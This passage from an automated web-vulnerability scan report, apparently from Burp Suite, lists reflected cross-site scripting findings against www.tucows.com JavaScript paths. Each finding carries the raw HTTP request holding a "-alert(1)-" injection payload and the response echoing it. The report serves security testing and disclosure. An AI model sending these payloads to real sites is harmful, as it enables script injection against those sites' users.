Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:43 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/includesc5955"-alert(1)-"19d51f958d8/js/ajaxlib.js";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.265. http://www.tucows.com/images/newassets/includes/js/ajaxlib.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/ajaxlib.js

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f0d6e"-alert(1)-"900705e6011 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/includes/jsf0d6e"-alert(1)-"900705e6011/ajaxlib.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:53 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/includes/jsf0d6e"-alert(1)-"900705e6011/ajaxlib.js";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.266. http://www.tucows.com/images/newassets/includes/js/ajaxlib.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/ajaxlib.js

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 72931"-alert(1)-"45543eb08c1 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/includes/js/ajaxlib.js72931"-alert(1)-"45543eb08c1 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:27:04 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/includes/js/ajaxlib.js72931"-alert(1)-"45543eb08c1";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.267. http://www.tucows.com/images/newassets/includes/js/ajaxlib.js [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/ajaxlib.js

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d4c98"-alert(1)-"3068e25c5c8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/includes/js/ajaxlib.js?d4c98"-alert(1)-"3068e25c5c8=1 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:09 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/includes/js/ajaxlib.js?d4c98"-alert(1)-"3068e25c5c8=1";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.268. http://www.tucows.com/images/newassets/includes/js/show_layer.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/show_layer.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fca30"-alert(1)-"22e394819af was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /imagesfca30"-alert(1)-"22e394819af/newassets/includes/js/show_layer.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:20 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/imagesfca30"-alert(1)-"22e394819af/newassets/includes/js/show_layer.js";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.269. http://www.tucows.com/images/newassets/includes/js/show_layer.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/show_layer.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5a833"-alert(1)-"f1b3a80e89c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets5a833"-alert(1)-"f1b3a80e89c/includes/js/show_layer.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:28 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets5a833"-alert(1)-"f1b3a80e89c/includes/js/show_layer.js";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.270. http://www.tucows.com/images/newassets/includes/js/show_layer.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/show_layer.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload be914"-alert(1)-"d7583b93b1f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/includesbe914"-alert(1)-"d7583b93b1f/js/show_layer.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:38 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/includesbe914"-alert(1)-"d7583b93b1f/js/show_layer.js";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.271. http://www.tucows.com/images/newassets/includes/js/show_layer.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/show_layer.js

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 254cc"-alert(1)-"7ef9881c0ed was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/includes/js254cc"-alert(1)-"7ef9881c0ed/show_layer.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:50 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/includes/js254cc"-alert(1)-"7ef9881c0ed/show_layer.js";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.272. http://www.tucows.com/images/newassets/includes/js/show_layer.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/show_layer.js

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aae9e"-alert(1)-"0ee85bcbea6 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/includes/js/show_layer.jsaae9e"-alert(1)-"0ee85bcbea6 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:59 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/includes/js/show_layer.jsaae9e"-alert(1)-"0ee85bcbea6";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.273. http://www.tucows.com/images/newassets/includes/js/show_layer.js [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/show_layer.js

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b38f6"-alert(1)-"339c2aebf39 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/includes/js/show_layer.js?b38f6"-alert(1)-"339c2aebf39=1 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:06 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/includes/js/show_layer.js?b38f6"-alert(1)-"339c2aebf39=1";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.274. http://www.tucows.com/images/newassets/includes/js/signupin.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/signupin.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f3b50"-alert(1)-"b444dbcbd88 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /imagesf3b50"-alert(1)-"b444dbcbd88/newassets/includes/js/signupin.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:56 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/imagesf3b50"-alert(1)-"b444dbcbd88/newassets/includes/js/signupin.js";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.275. http://www.tucows.com/images/newassets/includes/js/signupin.js [REST URL parameter 2]  previous  next
